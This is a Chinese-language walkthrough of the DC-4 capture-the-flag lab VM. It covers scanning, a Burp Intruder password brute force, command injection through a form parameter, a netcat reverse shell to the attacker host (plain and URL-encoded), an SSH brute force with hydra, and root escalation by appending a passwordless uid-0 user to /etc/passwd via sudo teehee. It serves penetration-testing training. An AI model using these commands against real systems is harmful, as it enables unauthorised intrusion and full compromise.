目录
DC-4靶机
DC-4靶机下载地址https://www.five86.com/downloads/DC-4.zip
安装可参照我DC-1文章
安装完成后 确保DC-4和kali处在同一网段下
1.主机发现
arp-scan -l
对比靶机MAC地址
确认靶机IP为192.168.20.142
2.端口扫描
nmap -sV -p- 192.168.20.142
开放了80端口和22端口
3.网页信息探测
浏览器访问192.168.20.142:80
出现一个登录框
用whatweb探测站点
whatweb -v 192.168.20.142
得出信息 nginx版本为1.15.10
4.敏感目录扫描
nikto -host 192.168.20.142
但是并没有什么敏感目录的信息
5.Web渗透
暴力破解
要登录网站就要知道账号和密码 这里直接进行暴力破解
上burpsuite
如何设置kali中的burp代理参考此文Kali学习--BurpSuite的代理功能_alex77taohua的博客-CSDN博客
登录页面中的用户名和密码框内都先输入1 然后抓包
将数据包发送至intruder中
猜测用户名是admin(绝大部分靶机登录界面都有admin用户) 对密码进行爆破 字典的话可以网上找 也可以私信我拿 设置如下
Positions模块
Payloads模块
在payload Options[Simple list]中点击load 选择字典文件 加载字典
设置完成后 点击右上角Start attack进行暴力破解
通过观察length值的不同来判断是否有正确的密码
对length进行降序排序 发现payload为happy时 响应长度和其他payload不一样 推测happy即为登录密码
进行登录尝试
登录成功
任意命令执行
点击command
选择List Files选项后 点击run
更换成Disk Usage选项
很明显一个选项对应一次代码执行
用burp抓取点击List Files选项后的数据包
发现ls -l命令是radio参数后的值
更改radio参数的值为pwd 点击forward放包 查看浏览器回显
pwd命令执行成功 这里有远程代码执行漏洞 可以利用此漏洞进行反弹shell
6.主机渗透
反弹shell
这里试过bash没法反弹 改用nc反弹shell
监听端口8888
nc -lvvp 8888
通过burp使DC-4靶机运行如下代码 以反弹shell
nc -e /bin/bash 192.168.20.130 8888
将以上代码转换为URL编码
%6e%63%20%2d%65%20%2f%62%69%6e%2f%62%61%73%68%20%31%39%32%2e%31%36%38%2e%32%30%2e%31%33%30%20%38%38%38%38
成功反弹shell
交互式getshell
python -c 'import pty;pty.spawn("/bin/bash")'
尝试提权
拿到shell之后下一步就是通过各种方式提权拿到最高权限root
尝试SUID提权
find / -perm -4000 2>/dev/null
并没有可以用的命令
查看一下/etc/passwd文件 看看是否有其他用户存在
cat /etc/passwd
发现三个用户
在之前进行端口扫描的时候 扫描出了22端口的ssh服务 尝试破解ssh登录
九头蛇爆破
既然有三个新增用户 那么家目录/home很有可能也有新增的用户目录 进入/home 收集一下信息
cd /home ls cd jim ls cd backups
查看这个passwords文件
cat old-passwords.bak
将这些密码复制 在桌面新建一个txt文件 粘贴密码
用九头蛇进行ssh登录爆破
hydra -l jim -P Desktop/hydra4.txt ssh://192.168.20.142
得到账号 jim 密码 jibril04
ssh登录
ssh jim@192.168.20.142
输入对应的密码 成功登录
深入探测
刚才/home/jim下的mbox无法打开
现在可以打开mbox了
cat mbox
提示我们收到了一封来自root用户的邮件
查找一下邮件mail的路径
find / -name mail
进入该目录
cd /var/mail ls cat jim
看到一个名为Charles的用户 以及密码
最终提权
直接进入该账户(小写)
su charles
查看权限
whoami
并不是root权限 还得提权
查看一下具有root权限的命令
发现有一个root权限的命令teehee(小型文本编辑器),可以利用这个命令进行提权
echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
teehee可以通过修改该文件达到添加用户的效果,文件格式为
注册名:口令:用户标识号:组标识号:用户名:用户主目录:命令解析程序
口令为x即代表存放有密码,为空即代表没有密码,识标号为0代表root权限
su test whoami
切换为新建的test用户 并查看权限
查看最终flag
cd /root ls cat flag.txt
成功通关!!!